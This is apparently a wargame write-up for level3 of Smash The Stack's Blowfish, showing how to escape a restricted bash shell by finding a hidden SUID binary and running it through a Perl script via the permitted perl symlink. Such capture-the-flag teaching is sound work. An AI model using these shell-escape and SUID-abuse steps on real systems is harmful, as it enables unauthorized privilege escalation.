Welcome back. Today we’re going to be looking at level3 of the Blowfish wargame from Smash The Stack. Since this is level3, I’ll assume you have the password from completing level2. Also, as always, the password will be stripped from this page and replaced with Y’s. Now, let’s ssh in and get started.
Upon logging in we see a banner message,
You are in a restricted shell. If you can break out of it, you need to find the backdoor hidden somewhere in the system. find it and cat /pass/level4
Ok, sounds like level 3 so far. Let’s check what we can find, and perhaps what this restricted shell is.
level3@blowfish:~$ find / -user level4 -group level3 2>/dev/null
-rbash: /dev/null: restricted: cannot redirect output
level3@blowfish:~$ find / -user level4 -group level3
-rbash: find: command not found
level3@blowfish:~$ pwd
/home/level3
level3@blowfish:~$ ls
-rbash: ls: command not found
level3@blowfish:~$ /usr/ls
-rbash: /usr/ls: restricted: cannot specify `/’ in command names
Interesting. We can’t use find or ls, or include slashes in our commands. So let’s see if we can’t scope out this restricted shell more. We can google and read up on rbash, but let’s also experiment.
level3@blowfish:~$ pwd
/home/level3
level3@blowfish:~$ echo $PATH
/home/rbash
Now we really need to find out what is in /home/rbash to see which program we might be able to execute or use. Let’s open up another PuTTy window, connect to blowfish again, but this time as level2! Once there, let’s look around. First we want to try to find this talked about back door. Second, we want to know what is in /home/rbash:
level2@blowfish:~$ find / -user level4 -group level3 2>/dev/null
/home/level3/.. /cat_lvl4
level2@blowfish:~$ ls -la “/home/level3/.. /cat_lvl4”
-r-sr-x— 1 level4 level3 7460 2007-12-03 13:41 /home/level3/.. /cat_lvl4
level2@blowfish:~$ ls -la /home/rbash
total 8
drwxr-xr-x 2 711 root 4096 2009-08-15 22:11 .
drwxr-xr-x 22 l3thal root 4096 2009-08-09 23:35 ..
lrwxrwxrwx 1 711 root 8 2009-08-15 22:11 cat -> /bin/cat
lrwxrwxrwx 1 711 root 13 2009-08-09 23:13 perl -> /usr/bin/perl
Alright, we found the SUID program we’re going to try to execute. The name is odd and has spaces in the directory so we wrap it in quotes. Also, we checked out /home/rbash and found two links, one to /bin/cat and one to /usr/bin/perl. So it looks like we’re probably going to be using these guys to hopefully break free of the restricted level3 shell! How will we break free? Well we need to execute the cat_level4 file. Best way to do that out of cat and perl, sounds like perl. If we can make a perl file that calls the cat_level4 file, we should be in business. So let’s jump on our level2 shell and do some programming. (Remember to keep it in /tmp and to clean up afterwards!)
First let’s create a perl program, let’s call it test.pl. In it we will simply call the program we want to execute. The whole script is as follows:
level2@blowfish:/tmp/.somedir$ cat test.pl
#!/usr/bin/perl
system(‘/home/level3/..\ \ \ \ \ /cat_lvl4’);
level2@blowfish:/tmp/.somedir$ chmod 777 test.pl
level2@blowfish:/tmp/.somedir$ ls -la test.pl
-rwxrwxrwx 1 level2 level2 62 2012-07-20 09:05 test.pl
Don’t forget to add executable permission for everyone, since we’re going to be running this program through perl on level3! Now let’s switch back over to our level3 shell and run the script.
level3@blowfish:~$ perl /tmp/.somedir/test.pl
YYYYYYYYYYY
Bam. Seems like the cat_level4 program already runs cat /pass/level4 for us. There we have it, the password for level4 and the end of level3. So, while restricted shell, rbash, can make it more difficult to perform actions, it doesn’t make it impossible. Obviously, we had to log-in to level2 to create the file and to look around. However, who knows when there might be a similar script that calls a similar SUID program that is vulnerable to attack. The successful attack is often the one delivered through an unexpected vector.